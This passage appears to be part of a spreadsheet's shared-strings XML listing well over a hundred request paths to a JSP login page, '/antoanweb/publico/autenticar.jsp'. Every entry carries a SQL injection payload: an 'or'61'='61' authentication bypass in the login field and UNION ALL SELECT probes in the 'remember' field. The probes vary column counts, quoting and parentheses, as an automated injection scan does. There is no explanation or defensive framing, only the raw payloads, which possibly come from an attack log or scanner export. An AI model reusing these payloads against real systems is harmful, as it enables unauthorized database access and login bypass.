    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2554,2554,2554,2554,2554,2554,2554,2554--and(('xmir'like'xmir&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect2716,2716,2716,2716,2716,2716,2716,2716,2716--and(('gfso'like'gfso&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect942,942,942,942,942,942,942,942,942,942--and(('akqi'like'akqi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5268--and((('fryh'like'fryh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect8774,8774--and((('qbki'like'qbki&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4414,4414,4414--and((('lwtu'like'lwtu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4560,4560,4560,4560--and((('coyy'like'coyy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2193,2193,2193,2193,2193--and((('nkel'like'nkel&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2862,2862,2862,2862,2862,2862--and((('vvto'like'vvto&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5854,5854,5854,5854,5854,5854,5854--and((('lxxm'like'lxxm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect3725,3725,3725,3725,3725,3725,3725,3725--and((('bdbz'like'bdbz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6035,6035,6035,6035,6035,6035,6035,6035,6035--and((('ccit'like'ccit&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1322,1322,1322,1322,1322,1322,1322,1322,1322,1322--and((('fpzn'like'fpzn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3305--and'awhg'like'awhg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5903,5903--and'kcud'like'kcud&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7646,7646,7646--and'tfpu'like'tfpu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8807,8807,8807,8807--and'cxnk'like'cxnk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8707,8707,8707,8707,8707--and'xlsy'like'xlsy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6977,6977,6977,6977,6977,6977--and'kouq'like'kouq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4921,4921,4921,4921,4921,4921,4921--and'sfmz'like'sfmz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect46,46,46,46,46,46,46,46--and'uykl'like'uykl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect818,818,818,818,818,818,818,818,818--and'phpg'like'phpg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9307,9307,9307,9307,9307,9307,9307,9307,9307,9307--and'lrts'like'lrts&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2286--and("xdlv"="xdlv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2761,2761--and("tkta"="tkta&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect5653,5653,5653--and("sbux"="sbux&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8170,8170,8170,8170--and("ndof"="ndof&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect9008,9008,9008,9008,9008--and("unyz"="unyz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect7541,7541,7541,7541,7541,7541--and("ycjb"="ycjb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect6501,6501,6501,6501,6501,6501,6501--and("ttko"="ttko&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect679,679,679,679,679,679,679,679--and("ubww"="ubww&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8206,8206,8206,8206,8206,8206,8206,8206,8206--and("llpl"="llpl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect3408,3408,3408,3408,3408,3408,3408,3408,3408,3408--and("uihq"="uihq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect411--and(("eqxm"="eqxm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6110,6110--and(("oryt"="oryt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2079,2079,2079--and(("ubed"="ubed&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect824,824,824,824--and(("zbvq"="zbvq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2590,2590,2590,2590,2590--and(("shhx"="shhx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect7410,7410,7410,7410,7410,7410--and(("tuwl"="tuwl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect623,623,623,623,623,623,623--and(("wyvl"="wyvl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect9254,9254,9254,9254,9254,9254,9254,9254--and(("pmzw"="pmzw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5944,5944,5944,5944,5944,5944,5944,5944,5944--and(("hwrz"="hwrz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect4713,4713,4713,4713,4713,4713,4713,4713,4713,4713--and(("btgw"="btgw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6494--and((("wmol"="wmol&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6523,6523--and((("ubok"="ubok&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2971,2971,2971--and((("wcws"="wcws&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect347,347,347,347--and((("dmur"="dmur&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect7860,7860,7860,7860,7860--and((("idev"="idev&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect5561,5561,5561,5561,5561,5561--and((("zqoc"="zqoc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9988,9988,9988,9988,9988,9988,9988--and((("twsi"="twsi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect8351,8351,8351,8351,8351,8351,8351,8351--and((("exxl"="exxl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6759,6759,6759,6759,6759,6759,6759,6759,6759--and((("shmi"="shmi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect1405,1405,1405,1405,1405,1405,1405,1405,1405,1405--and((("jwrz"="jwrz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7134--and"qfrs"="qfrs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6876,6876--and"pwlh"="pwlh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2398,2398,2398--and"zwkg"="zwkg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7032,7032,7032,7032--and"owzz"="owzz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8914,8914,8914,8914,8914--and"pdab"="pdab&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5738,5738,5738,5738,5738,5738--and"aokx"="aokx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect163,163,163,163,163,163,163--and"pslr"="pslr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1157,1157,1157,1157,1157,1157,1157,1157--and"dmvp"="dmvp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect1195,1195,1195,1195,1195,1195,1195,1195,1195--and"hvlg"="hvlg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6826,6826,6826,6826,6826,6826,6826,6826,6826,6826--and"xroe"="xroe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4633--and("vtab"like"vtab&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect9252,9252--and("kzba"like"kzba&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect8890,8890,8890--and("kynj"like"kynj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect651,651,651,651--and("gpyg"like"gpyg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect7715,7715,7715,7715,7715--and("znsz"like"znsz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect7819,7819,7819,7819,7819,7819--and("vjfi"like"vjfi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect4232,4232,4232,4232,4232,4232,4232--and("wdof"like"wdof&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2474,2474,2474,2474,2474,2474,2474,2474--and("flcc"like"flcc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect2990,2990,2990,2990,2990,2990,2990,2990,2990--and("hgmx"like"hgmx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselect6897,6897,6897,6897,6897,6897,6897,6897,6897,6897--and("pcom"like"pcom&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect3321--and(("zvqx"like"zvqx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5487,5487--and(("ainm"like"ainm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2226,2226,2226--and(("iroz"like"iroz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect6175,6175,6175,6175--and(("lvbu"like"lvbu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect8439,8439,8439,8439,8439--and(("zota"like"zota&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect5412,5412,5412,5412,5412,5412--and(("oisx"like"oisx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect2199,2199,2199,2199,2199,2199,2199--and(("bwiv"like"bwiv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect124,124,124,124,124,124,124,124--and(("obwe"like"obwe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect3350,3350,3350,3350,3350,3350,3350,3350,3350--and(("hqpl"like"hqpl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselect7986,7986,7986,7986,7986,7986,7986,7986,7986,7986--and(("lavm"like"lavm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9037--and((("qwku"like"qwku&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9162,9162--and((("dloz"like"dloz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9960,9960,9960--and((("bgzd"like"bgzd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9898,9898,9898,9898--and((("mtsx"like"mtsx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect6653,6653,6653,6653,6653--and((("jtom"like"jtom&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect178,178,178,178,178,178--and((("hgxe"like"hgxe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect1003,1003,1003,1003,1003,1003,1003--and((("jgql"like"jgql&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect2649,2649,2649,2649,2649,2649,2649,2649--and((("wpyd"like"wpyd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect1983,1983,1983,1983,1983,1983,1983,1983,1983--and((("psot"like"psot&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselect9028,9028,9028,9028,9028,9028,9028,9028,9028,9028--and((("junz"like"junz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3056--and"zikd"like"zikd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7255,7255--and"qncy"like"qncy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6043,6043,6043--and"icdm"like"icdm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect3061,3061,3061,3061--and"mznw"like"mznw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9938,9938,9938,9938,9938--and"cccp"like"cccp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2052,2052,2052,2052,2052,2052--and"ocdn"like"ocdn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect6460,6460,6460,6460,6460,6460,6460--and"ivxs"like"ivxs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4968,4968,4968,4968,4968,4968,4968,4968--and"oozh"like"oozh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect174,174,174,174,174,174,174,174,174--and"irlt"like"irlt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9565,9565,9565,9565,9565,9565,9565,9565,9565,9565--and"qceh"like"qceh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect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--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect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--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect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--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect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--and(6320=6320&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and(4437=4437&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and(7524=7524&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and(9255=9255&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(9797=9797&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(2854=2854&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(9812=9812&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(8130=8130&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(6604=6604&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and(3639=3639&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null--and((1900=1900&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and((2121=2121&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and((5124=5124&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and((1415=1415&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((6218=6218&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((7010=7010&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((3576=3576&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((1504=1504&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((8766=8766&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and((8360=8360&amp;modo=entrar</t>
  </si>
  <si>
